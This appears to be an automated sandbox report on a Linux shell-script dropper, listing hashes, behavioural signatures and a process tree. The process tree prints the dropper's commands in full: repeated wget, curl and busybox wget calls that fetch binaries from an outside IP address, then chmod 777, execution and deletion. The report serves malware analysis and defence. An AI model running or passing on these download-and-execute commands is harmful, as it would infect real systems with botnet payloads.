Analysis
-
max time kernel
19s -
max time network
131s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240508-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240508-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
18/10/2024, 01:59
Static task
static1
Behavioral task
behavioral1
Sample
7477bdc50195f9712b6e4ff13cd7b824e27bca345d73948c021d987b5d244514.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
7477bdc50195f9712b6e4ff13cd7b824e27bca345d73948c021d987b5d244514.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
7477bdc50195f9712b6e4ff13cd7b824e27bca345d73948c021d987b5d244514.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
7477bdc50195f9712b6e4ff13cd7b824e27bca345d73948c021d987b5d244514.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
7477bdc50195f9712b6e4ff13cd7b824e27bca345d73948c021d987b5d244514.sh
-
Size
10KB
-
MD5
d08f4f01c6ec9c67ead46ab98f031a55
-
SHA1
cac804b670bc7011aff98353a06d5906917e496a
-
SHA256
7477bdc50195f9712b6e4ff13cd7b824e27bca345d73948c021d987b5d244514
-
SHA512
be5c70e0361500fe82048f5f3cc74bd6019fa75dc8edd3d43bdc5cf875e01e8b9a0f7922e67c42ea1a96e8821f8997c3b73c2f019b571a3ca202dc155e6bbbc7
-
SSDEEP
192:JKto885QciICt1xQYUHgw6AtXj89F6UnrPCJpBrPCJpM21xBA885QcozXj89FWY3:JKG885QciICt1xOUnrPCJpBrPCJpM21M
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1610 chmod 1574 chmod 1598 chmod 1622 chmod 1568 chmod 1592 chmod 1616 chmod 1664 chmod 1514 chmod 1562 chmod 1676 chmod 1544 chmod 1628 chmod 1646 chmod 1526 chmod 1532 chmod 1604 chmod 1640 chmod 1658 chmod 1580 chmod 1586 chmod 1652 chmod 1670 chmod 1520 chmod 1550 chmod 1634 chmod 1538 chmod 1556 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/0lHfL4npowzS4jGTj1i4u7HGUOFeLOPy1c 1515 0lHfL4npowzS4jGTj1i4u7HGUOFeLOPy1c /tmp/EIbvlORrRhzsiyIXJh6ptRhv8eZurOtGq8 1521 EIbvlORrRhzsiyIXJh6ptRhv8eZurOtGq8 /tmp/4TOW8fpeWPUedySDj3Bn7JwNFSehOimCjA 1527 4TOW8fpeWPUedySDj3Bn7JwNFSehOimCjA /tmp/fohPRCfDwbUa538sCvtsJfDnNvMCnj35YL 1533 fohPRCfDwbUa538sCvtsJfDnNvMCnj35YL /tmp/1EBVtN1Fws7MEdUaqLMe02UHZCniNB8wTD 1539 1EBVtN1Fws7MEdUaqLMe02UHZCniNB8wTD /tmp/6MgSwtcrgRdpWdkIWJa1jdOdSiocuOtPWj 1545 6MgSwtcrgRdpWdkIWJa1jdOdSiocuOtPWj /tmp/AtHo16jIBXpk2LiRB7IDfuaxVfx8E1TbZs 1551 AtHo16jIBXpk2LiRB7IDfuaxVfx8E1TbZs /tmp/djVle6T71YXXfjsEnSm4CZ6stk0wE9n003 1557 djVle6T71YXXfjsEnSm4CZ6stk0wE9n003 /tmp/G8rtwMrqfQ3aU5gj7b59hiJSQ7sGjeDMnp 1563 G8rtwMrqfQ3aU5gj7b59hiJSQ7sGjeDMnp /tmp/Pc1FZXKrrtv2wcDqtpVViWjyhlu7tQ0fiN 1569 Pc1FZXKrrtv2wcDqtpVViWjyhlu7tQ0fiN /tmp/ukydHV98yzuiaTZfLkSAjstPpW905BtH3z 1575 ukydHV98yzuiaTZfLkSAjstPpW905BtH3z /tmp/wT5Da5WeDrvhjdwXdgOgq5Q3BGfGX9Da7h 1581 wT5Da5WeDrvhjdwXdgOgq5Q3BGfGX9Da7h /tmp/FXSwQZfSDGeAuZsXY2OR6W3MpaBwxnTF1a 1587 FXSwQZfSDGeAuZsXY2OR6W3MpaBwxnTF1a /tmp/rcmj8X0Q1cu8b0Mbyzi0URdxMezXmIvVnP 1593 rcmj8X0Q1cu8b0Mbyzi0URdxMezXmIvVnP /tmp/rcmj8X0Q1cu8b0Mbyzi0URdxMezXmIvVnP 1599 rcmj8X0Q1cu8b0Mbyzi0URdxMezXmIvVnP /tmp/wT5Da5WeDrvhjdwXdgOgq5Q3BGfGX9Da7h 1605 wT5Da5WeDrvhjdwXdgOgq5Q3BGfGX9Da7h /tmp/FXSwQZfSDGeAuZsXY2OR6W3MpaBwxnTF1a 1611 FXSwQZfSDGeAuZsXY2OR6W3MpaBwxnTF1a /tmp/0lHfL4npowzS4jGTj1i4u7HGUOFeLOPy1c 1617 0lHfL4npowzS4jGTj1i4u7HGUOFeLOPy1c /tmp/EIbvlORrRhzsiyIXJh6ptRhv8eZurOtGq8 1623 EIbvlORrRhzsiyIXJh6ptRhv8eZurOtGq8 /tmp/1EBVtN1Fws7MEdUaqLMe02UHZCniNB8wTD 1629 1EBVtN1Fws7MEdUaqLMe02UHZCniNB8wTD /tmp/6MgSwtcrgRdpWdkIWJa1jdOdSiocuOtPWj 1635 6MgSwtcrgRdpWdkIWJa1jdOdSiocuOtPWj /tmp/4TOW8fpeWPUedySDj3Bn7JwNFSehOimCjA 1641 4TOW8fpeWPUedySDj3Bn7JwNFSehOimCjA /tmp/fohPRCfDwbUa538sCvtsJfDnNvMCnj35YL 1647 fohPRCfDwbUa538sCvtsJfDnNvMCnj35YL /tmp/G8rtwMrqfQ3aU5gj7b59hiJSQ7sGjeDMnp 1653 G8rtwMrqfQ3aU5gj7b59hiJSQ7sGjeDMnp /tmp/Pc1FZXKrrtv2wcDqtpVViWjyhlu7tQ0fiN 1659 Pc1FZXKrrtv2wcDqtpVViWjyhlu7tQ0fiN /tmp/ukydHV98yzuiaTZfLkSAjstPpW905BtH3z 1665 ukydHV98yzuiaTZfLkSAjstPpW905BtH3z /tmp/AtHo16jIBXpk2LiRB7IDfuaxVfx8E1TbZs 1671 AtHo16jIBXpk2LiRB7IDfuaxVfx8E1TbZs /tmp/djVle6T71YXXfjsEnSm4CZ6stk0wE9n003 1677 djVle6T71YXXfjsEnSm4CZ6stk0wE9n003 -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/rcmj8X0Q1cu8b0Mbyzi0URdxMezXmIvVnP curl File opened for modification /tmp/1EBVtN1Fws7MEdUaqLMe02UHZCniNB8wTD curl File opened for modification /tmp/6MgSwtcrgRdpWdkIWJa1jdOdSiocuOtPWj curl File opened for modification /tmp/fohPRCfDwbUa538sCvtsJfDnNvMCnj35YL curl File opened for modification /tmp/ukydHV98yzuiaTZfLkSAjstPpW905BtH3z curl File opened for modification /tmp/ukydHV98yzuiaTZfLkSAjstPpW905BtH3z curl File opened for modification /tmp/AtHo16jIBXpk2LiRB7IDfuaxVfx8E1TbZs curl File opened for modification /tmp/djVle6T71YXXfjsEnSm4CZ6stk0wE9n003 curl File opened for modification /tmp/FXSwQZfSDGeAuZsXY2OR6W3MpaBwxnTF1a curl File opened for modification /tmp/FXSwQZfSDGeAuZsXY2OR6W3MpaBwxnTF1a curl File opened for modification /tmp/EIbvlORrRhzsiyIXJh6ptRhv8eZurOtGq8 curl File opened for modification /tmp/EIbvlORrRhzsiyIXJh6ptRhv8eZurOtGq8 curl File opened for modification /tmp/4TOW8fpeWPUedySDj3Bn7JwNFSehOimCjA curl File opened for modification /tmp/1EBVtN1Fws7MEdUaqLMe02UHZCniNB8wTD curl File opened for modification /tmp/G8rtwMrqfQ3aU5gj7b59hiJSQ7sGjeDMnp curl File opened for modification /tmp/Pc1FZXKrrtv2wcDqtpVViWjyhlu7tQ0fiN curl File opened for modification /tmp/6MgSwtcrgRdpWdkIWJa1jdOdSiocuOtPWj curl File opened for modification /tmp/Pc1FZXKrrtv2wcDqtpVViWjyhlu7tQ0fiN curl File opened for modification /tmp/rcmj8X0Q1cu8b0Mbyzi0URdxMezXmIvVnP curl File opened for modification /tmp/djVle6T71YXXfjsEnSm4CZ6stk0wE9n003 curl File opened for modification /tmp/fohPRCfDwbUa538sCvtsJfDnNvMCnj35YL curl File opened for modification /tmp/0lHfL4npowzS4jGTj1i4u7HGUOFeLOPy1c curl File opened for modification /tmp/wT5Da5WeDrvhjdwXdgOgq5Q3BGfGX9Da7h curl File opened for modification /tmp/4TOW8fpeWPUedySDj3Bn7JwNFSehOimCjA curl File opened for modification /tmp/wT5Da5WeDrvhjdwXdgOgq5Q3BGfGX9Da7h curl File opened for modification /tmp/G8rtwMrqfQ3aU5gj7b59hiJSQ7sGjeDMnp curl File opened for modification /tmp/AtHo16jIBXpk2LiRB7IDfuaxVfx8E1TbZs curl File opened for modification /tmp/0lHfL4npowzS4jGTj1i4u7HGUOFeLOPy1c curl
Processes
-
/tmp/7477bdc50195f9712b6e4ff13cd7b824e27bca345d73948c021d987b5d244514.sh/tmp/7477bdc50195f9712b6e4ff13cd7b824e27bca345d73948c021d987b5d244514.sh1⤵PID:1506
-
/bin/rm/bin/rm bins.sh2⤵PID:1507
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/0lHfL4npowzS4jGTj1i4u7HGUOFeLOPy1c2⤵PID:1508
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/0lHfL4npowzS4jGTj1i4u7HGUOFeLOPy1c2⤵
- Writes file to tmp directory
PID:1512
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/0lHfL4npowzS4jGTj1i4u7HGUOFeLOPy1c2⤵PID:1513
-
-
/bin/chmodchmod 777 0lHfL4npowzS4jGTj1i4u7HGUOFeLOPy1c2⤵
- File and Directory Permissions Modification
PID:1514
-
-
/tmp/0lHfL4npowzS4jGTj1i4u7HGUOFeLOPy1c./0lHfL4npowzS4jGTj1i4u7HGUOFeLOPy1c2⤵
- Executes dropped EXE
PID:1515
-
-
/bin/rmrm 0lHfL4npowzS4jGTj1i4u7HGUOFeLOPy1c2⤵PID:1516
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/EIbvlORrRhzsiyIXJh6ptRhv8eZurOtGq82⤵PID:1517
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/EIbvlORrRhzsiyIXJh6ptRhv8eZurOtGq82⤵
- Writes file to tmp directory
PID:1518
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/EIbvlORrRhzsiyIXJh6ptRhv8eZurOtGq82⤵PID:1519
-
-
/bin/chmodchmod 777 EIbvlORrRhzsiyIXJh6ptRhv8eZurOtGq82⤵
- File and Directory Permissions Modification
PID:1520
-
-
/tmp/EIbvlORrRhzsiyIXJh6ptRhv8eZurOtGq8./EIbvlORrRhzsiyIXJh6ptRhv8eZurOtGq82⤵
- Executes dropped EXE
PID:1521
-
-
/bin/rmrm EIbvlORrRhzsiyIXJh6ptRhv8eZurOtGq82⤵PID:1522
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/4TOW8fpeWPUedySDj3Bn7JwNFSehOimCjA2⤵PID:1523
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/4TOW8fpeWPUedySDj3Bn7JwNFSehOimCjA2⤵
- Writes file to tmp directory
PID:1524
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/4TOW8fpeWPUedySDj3Bn7JwNFSehOimCjA2⤵PID:1525
-
-
/bin/chmodchmod 777 4TOW8fpeWPUedySDj3Bn7JwNFSehOimCjA2⤵
- File and Directory Permissions Modification
PID:1526
-
-
/tmp/4TOW8fpeWPUedySDj3Bn7JwNFSehOimCjA./4TOW8fpeWPUedySDj3Bn7JwNFSehOimCjA2⤵
- Executes dropped EXE
PID:1527
-
-
/bin/rmrm 4TOW8fpeWPUedySDj3Bn7JwNFSehOimCjA2⤵PID:1528
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/fohPRCfDwbUa538sCvtsJfDnNvMCnj35YL2⤵PID:1529
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/fohPRCfDwbUa538sCvtsJfDnNvMCnj35YL2⤵
- Writes file to tmp directory
PID:1530
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/fohPRCfDwbUa538sCvtsJfDnNvMCnj35YL2⤵PID:1531
-
-
/bin/chmodchmod 777 fohPRCfDwbUa538sCvtsJfDnNvMCnj35YL2⤵
- File and Directory Permissions Modification
PID:1532
-
-
/tmp/fohPRCfDwbUa538sCvtsJfDnNvMCnj35YL./fohPRCfDwbUa538sCvtsJfDnNvMCnj35YL2⤵
- Executes dropped EXE
PID:1533
-
-
/bin/rmrm fohPRCfDwbUa538sCvtsJfDnNvMCnj35YL2⤵PID:1534
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/1EBVtN1Fws7MEdUaqLMe02UHZCniNB8wTD2⤵PID:1535
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/1EBVtN1Fws7MEdUaqLMe02UHZCniNB8wTD2⤵
- Writes file to tmp directory
PID:1536
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/1EBVtN1Fws7MEdUaqLMe02UHZCniNB8wTD2⤵PID:1537
-
-
/bin/chmodchmod 777 1EBVtN1Fws7MEdUaqLMe02UHZCniNB8wTD2⤵
- File and Directory Permissions Modification
PID:1538
-
-
/tmp/1EBVtN1Fws7MEdUaqLMe02UHZCniNB8wTD./1EBVtN1Fws7MEdUaqLMe02UHZCniNB8wTD2⤵
- Executes dropped EXE
PID:1539
-
-
/bin/rmrm 1EBVtN1Fws7MEdUaqLMe02UHZCniNB8wTD2⤵PID:1540
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/6MgSwtcrgRdpWdkIWJa1jdOdSiocuOtPWj2⤵PID:1541
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/6MgSwtcrgRdpWdkIWJa1jdOdSiocuOtPWj2⤵
- Writes file to tmp directory
PID:1542
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/6MgSwtcrgRdpWdkIWJa1jdOdSiocuOtPWj2⤵PID:1543
-
-
/bin/chmodchmod 777 6MgSwtcrgRdpWdkIWJa1jdOdSiocuOtPWj2⤵
- File and Directory Permissions Modification
PID:1544
-
-
/tmp/6MgSwtcrgRdpWdkIWJa1jdOdSiocuOtPWj./6MgSwtcrgRdpWdkIWJa1jdOdSiocuOtPWj2⤵
- Executes dropped EXE
PID:1545
-
-
/bin/rmrm 6MgSwtcrgRdpWdkIWJa1jdOdSiocuOtPWj2⤵PID:1546
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/AtHo16jIBXpk2LiRB7IDfuaxVfx8E1TbZs2⤵PID:1547
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/AtHo16jIBXpk2LiRB7IDfuaxVfx8E1TbZs2⤵
- Writes file to tmp directory
PID:1548
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/AtHo16jIBXpk2LiRB7IDfuaxVfx8E1TbZs2⤵PID:1549
-
-
/bin/chmodchmod 777 AtHo16jIBXpk2LiRB7IDfuaxVfx8E1TbZs2⤵
- File and Directory Permissions Modification
PID:1550
-
-
/tmp/AtHo16jIBXpk2LiRB7IDfuaxVfx8E1TbZs./AtHo16jIBXpk2LiRB7IDfuaxVfx8E1TbZs2⤵
- Executes dropped EXE
PID:1551
-
-
/bin/rmrm AtHo16jIBXpk2LiRB7IDfuaxVfx8E1TbZs2⤵PID:1552
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/djVle6T71YXXfjsEnSm4CZ6stk0wE9n0032⤵PID:1553
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/djVle6T71YXXfjsEnSm4CZ6stk0wE9n0032⤵
- Writes file to tmp directory
PID:1554
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/djVle6T71YXXfjsEnSm4CZ6stk0wE9n0032⤵PID:1555
-
-
/bin/chmodchmod 777 djVle6T71YXXfjsEnSm4CZ6stk0wE9n0032⤵
- File and Directory Permissions Modification
PID:1556
-
-
/tmp/djVle6T71YXXfjsEnSm4CZ6stk0wE9n003./djVle6T71YXXfjsEnSm4CZ6stk0wE9n0032⤵
- Executes dropped EXE
PID:1557
-
-
/bin/rmrm djVle6T71YXXfjsEnSm4CZ6stk0wE9n0032⤵PID:1558
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/G8rtwMrqfQ3aU5gj7b59hiJSQ7sGjeDMnp2⤵PID:1559
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/G8rtwMrqfQ3aU5gj7b59hiJSQ7sGjeDMnp2⤵
- Writes file to tmp directory
PID:1560
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/G8rtwMrqfQ3aU5gj7b59hiJSQ7sGjeDMnp2⤵PID:1561
-
-
/bin/chmodchmod 777 G8rtwMrqfQ3aU5gj7b59hiJSQ7sGjeDMnp2⤵
- File and Directory Permissions Modification
PID:1562
-
-
/tmp/G8rtwMrqfQ3aU5gj7b59hiJSQ7sGjeDMnp./G8rtwMrqfQ3aU5gj7b59hiJSQ7sGjeDMnp2⤵
- Executes dropped EXE
PID:1563
-
-
/bin/rmrm G8rtwMrqfQ3aU5gj7b59hiJSQ7sGjeDMnp2⤵PID:1564
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Pc1FZXKrrtv2wcDqtpVViWjyhlu7tQ0fiN2⤵PID:1565
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Pc1FZXKrrtv2wcDqtpVViWjyhlu7tQ0fiN2⤵
- Writes file to tmp directory
PID:1566
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Pc1FZXKrrtv2wcDqtpVViWjyhlu7tQ0fiN2⤵PID:1567
-
-
/bin/chmodchmod 777 Pc1FZXKrrtv2wcDqtpVViWjyhlu7tQ0fiN2⤵
- File and Directory Permissions Modification
PID:1568
-
-
/tmp/Pc1FZXKrrtv2wcDqtpVViWjyhlu7tQ0fiN./Pc1FZXKrrtv2wcDqtpVViWjyhlu7tQ0fiN2⤵
- Executes dropped EXE
PID:1569
-
-
/bin/rmrm Pc1FZXKrrtv2wcDqtpVViWjyhlu7tQ0fiN2⤵PID:1570
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/ukydHV98yzuiaTZfLkSAjstPpW905BtH3z2⤵PID:1571
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ukydHV98yzuiaTZfLkSAjstPpW905BtH3z2⤵
- Writes file to tmp directory
PID:1572
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ukydHV98yzuiaTZfLkSAjstPpW905BtH3z2⤵PID:1573
-
-
/bin/chmodchmod 777 ukydHV98yzuiaTZfLkSAjstPpW905BtH3z2⤵
- File and Directory Permissions Modification
PID:1574
-
-
/tmp/ukydHV98yzuiaTZfLkSAjstPpW905BtH3z./ukydHV98yzuiaTZfLkSAjstPpW905BtH3z2⤵
- Executes dropped EXE
PID:1575
-
-
/bin/rmrm ukydHV98yzuiaTZfLkSAjstPpW905BtH3z2⤵PID:1576
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/wT5Da5WeDrvhjdwXdgOgq5Q3BGfGX9Da7h2⤵PID:1577
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/wT5Da5WeDrvhjdwXdgOgq5Q3BGfGX9Da7h2⤵
- Writes file to tmp directory
PID:1578
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/wT5Da5WeDrvhjdwXdgOgq5Q3BGfGX9Da7h2⤵PID:1579
-
-
/bin/chmodchmod 777 wT5Da5WeDrvhjdwXdgOgq5Q3BGfGX9Da7h2⤵
- File and Directory Permissions Modification
PID:1580
-
-
/tmp/wT5Da5WeDrvhjdwXdgOgq5Q3BGfGX9Da7h./wT5Da5WeDrvhjdwXdgOgq5Q3BGfGX9Da7h2⤵
- Executes dropped EXE
PID:1581
-
-
/bin/rmrm wT5Da5WeDrvhjdwXdgOgq5Q3BGfGX9Da7h2⤵PID:1582
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/FXSwQZfSDGeAuZsXY2OR6W3MpaBwxnTF1a2⤵PID:1583
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/FXSwQZfSDGeAuZsXY2OR6W3MpaBwxnTF1a2⤵
- Writes file to tmp directory
PID:1584
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/FXSwQZfSDGeAuZsXY2OR6W3MpaBwxnTF1a2⤵PID:1585
-
-
/bin/chmodchmod 777 FXSwQZfSDGeAuZsXY2OR6W3MpaBwxnTF1a2⤵
- File and Directory Permissions Modification
PID:1586
-
-
/tmp/FXSwQZfSDGeAuZsXY2OR6W3MpaBwxnTF1a./FXSwQZfSDGeAuZsXY2OR6W3MpaBwxnTF1a2⤵
- Executes dropped EXE
PID:1587
-
-
/bin/rmrm FXSwQZfSDGeAuZsXY2OR6W3MpaBwxnTF1a2⤵PID:1588
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/rcmj8X0Q1cu8b0Mbyzi0URdxMezXmIvVnP2⤵PID:1589
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/rcmj8X0Q1cu8b0Mbyzi0URdxMezXmIvVnP2⤵
- Writes file to tmp directory
PID:1590
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/rcmj8X0Q1cu8b0Mbyzi0URdxMezXmIvVnP2⤵PID:1591
-
-
/bin/chmodchmod 777 rcmj8X0Q1cu8b0Mbyzi0URdxMezXmIvVnP2⤵
- File and Directory Permissions Modification
PID:1592
-
-
/tmp/rcmj8X0Q1cu8b0Mbyzi0URdxMezXmIvVnP./rcmj8X0Q1cu8b0Mbyzi0URdxMezXmIvVnP2⤵
- Executes dropped EXE
PID:1593
-
-
/bin/rmrm rcmj8X0Q1cu8b0Mbyzi0URdxMezXmIvVnP2⤵PID:1594
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/rcmj8X0Q1cu8b0Mbyzi0URdxMezXmIvVnP2⤵PID:1595
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/rcmj8X0Q1cu8b0Mbyzi0URdxMezXmIvVnP2⤵
- Writes file to tmp directory
PID:1596
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/rcmj8X0Q1cu8b0Mbyzi0URdxMezXmIvVnP2⤵PID:1597
-
-
/bin/chmodchmod 777 rcmj8X0Q1cu8b0Mbyzi0URdxMezXmIvVnP2⤵
- File and Directory Permissions Modification
PID:1598
-
-
/tmp/rcmj8X0Q1cu8b0Mbyzi0URdxMezXmIvVnP./rcmj8X0Q1cu8b0Mbyzi0URdxMezXmIvVnP2⤵
- Executes dropped EXE
PID:1599
-
-
/bin/rmrm rcmj8X0Q1cu8b0Mbyzi0URdxMezXmIvVnP2⤵PID:1600
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/wT5Da5WeDrvhjdwXdgOgq5Q3BGfGX9Da7h2⤵PID:1601
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/wT5Da5WeDrvhjdwXdgOgq5Q3BGfGX9Da7h2⤵
- Writes file to tmp directory
PID:1602
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/wT5Da5WeDrvhjdwXdgOgq5Q3BGfGX9Da7h2⤵PID:1603
-
-
/bin/chmodchmod 777 wT5Da5WeDrvhjdwXdgOgq5Q3BGfGX9Da7h2⤵
- File and Directory Permissions Modification
PID:1604
-
-
/tmp/wT5Da5WeDrvhjdwXdgOgq5Q3BGfGX9Da7h./wT5Da5WeDrvhjdwXdgOgq5Q3BGfGX9Da7h2⤵
- Executes dropped EXE
PID:1605
-
-
/bin/rmrm wT5Da5WeDrvhjdwXdgOgq5Q3BGfGX9Da7h2⤵PID:1606
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/FXSwQZfSDGeAuZsXY2OR6W3MpaBwxnTF1a2⤵PID:1607
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/FXSwQZfSDGeAuZsXY2OR6W3MpaBwxnTF1a2⤵
- Writes file to tmp directory
PID:1608
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/FXSwQZfSDGeAuZsXY2OR6W3MpaBwxnTF1a2⤵PID:1609
-
-
/bin/chmodchmod 777 FXSwQZfSDGeAuZsXY2OR6W3MpaBwxnTF1a2⤵
- File and Directory Permissions Modification
PID:1610
-
-
/tmp/FXSwQZfSDGeAuZsXY2OR6W3MpaBwxnTF1a./FXSwQZfSDGeAuZsXY2OR6W3MpaBwxnTF1a2⤵
- Executes dropped EXE
PID:1611
-
-
/bin/rmrm FXSwQZfSDGeAuZsXY2OR6W3MpaBwxnTF1a2⤵PID:1612
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/0lHfL4npowzS4jGTj1i4u7HGUOFeLOPy1c2⤵PID:1613
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/0lHfL4npowzS4jGTj1i4u7HGUOFeLOPy1c2⤵
- Writes file to tmp directory
PID:1614
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/0lHfL4npowzS4jGTj1i4u7HGUOFeLOPy1c2⤵PID:1615
-
-
/bin/chmodchmod 777 0lHfL4npowzS4jGTj1i4u7HGUOFeLOPy1c2⤵
- File and Directory Permissions Modification
PID:1616
-
-
/tmp/0lHfL4npowzS4jGTj1i4u7HGUOFeLOPy1c./0lHfL4npowzS4jGTj1i4u7HGUOFeLOPy1c2⤵
- Executes dropped EXE
PID:1617
-
-
/bin/rmrm 0lHfL4npowzS4jGTj1i4u7HGUOFeLOPy1c2⤵PID:1618
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/EIbvlORrRhzsiyIXJh6ptRhv8eZurOtGq82⤵PID:1619
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/EIbvlORrRhzsiyIXJh6ptRhv8eZurOtGq82⤵
- Writes file to tmp directory
PID:1620
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/EIbvlORrRhzsiyIXJh6ptRhv8eZurOtGq82⤵PID:1621
-
-
/bin/chmodchmod 777 EIbvlORrRhzsiyIXJh6ptRhv8eZurOtGq82⤵
- File and Directory Permissions Modification
PID:1622
-
-
/tmp/EIbvlORrRhzsiyIXJh6ptRhv8eZurOtGq8./EIbvlORrRhzsiyIXJh6ptRhv8eZurOtGq82⤵
- Executes dropped EXE
PID:1623
-
-
/bin/rmrm EIbvlORrRhzsiyIXJh6ptRhv8eZurOtGq82⤵PID:1624
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/1EBVtN1Fws7MEdUaqLMe02UHZCniNB8wTD2⤵PID:1625
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/1EBVtN1Fws7MEdUaqLMe02UHZCniNB8wTD2⤵
- Writes file to tmp directory
PID:1626
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/1EBVtN1Fws7MEdUaqLMe02UHZCniNB8wTD2⤵PID:1627
-
-
/bin/chmodchmod 777 1EBVtN1Fws7MEdUaqLMe02UHZCniNB8wTD2⤵
- File and Directory Permissions Modification
PID:1628
-
-
/tmp/1EBVtN1Fws7MEdUaqLMe02UHZCniNB8wTD./1EBVtN1Fws7MEdUaqLMe02UHZCniNB8wTD2⤵
- Executes dropped EXE
PID:1629
-
-
/bin/rmrm 1EBVtN1Fws7MEdUaqLMe02UHZCniNB8wTD2⤵PID:1630
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/6MgSwtcrgRdpWdkIWJa1jdOdSiocuOtPWj2⤵PID:1631
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/6MgSwtcrgRdpWdkIWJa1jdOdSiocuOtPWj2⤵
- Writes file to tmp directory
PID:1632
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/6MgSwtcrgRdpWdkIWJa1jdOdSiocuOtPWj2⤵PID:1633
-
-
/bin/chmodchmod 777 6MgSwtcrgRdpWdkIWJa1jdOdSiocuOtPWj2⤵
- File and Directory Permissions Modification
PID:1634
-
-
/tmp/6MgSwtcrgRdpWdkIWJa1jdOdSiocuOtPWj./6MgSwtcrgRdpWdkIWJa1jdOdSiocuOtPWj2⤵
- Executes dropped EXE
PID:1635
-
-
/bin/rmrm 6MgSwtcrgRdpWdkIWJa1jdOdSiocuOtPWj2⤵PID:1636
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/4TOW8fpeWPUedySDj3Bn7JwNFSehOimCjA2⤵PID:1637
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/4TOW8fpeWPUedySDj3Bn7JwNFSehOimCjA2⤵
- Writes file to tmp directory
PID:1638
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/4TOW8fpeWPUedySDj3Bn7JwNFSehOimCjA2⤵PID:1639
-
-
/bin/chmodchmod 777 4TOW8fpeWPUedySDj3Bn7JwNFSehOimCjA2⤵
- File and Directory Permissions Modification
PID:1640
-
-
/tmp/4TOW8fpeWPUedySDj3Bn7JwNFSehOimCjA./4TOW8fpeWPUedySDj3Bn7JwNFSehOimCjA2⤵
- Executes dropped EXE
PID:1641
-
-
/bin/rmrm 4TOW8fpeWPUedySDj3Bn7JwNFSehOimCjA2⤵PID:1642
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/fohPRCfDwbUa538sCvtsJfDnNvMCnj35YL2⤵PID:1643
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/fohPRCfDwbUa538sCvtsJfDnNvMCnj35YL2⤵
- Writes file to tmp directory
PID:1644
-
-
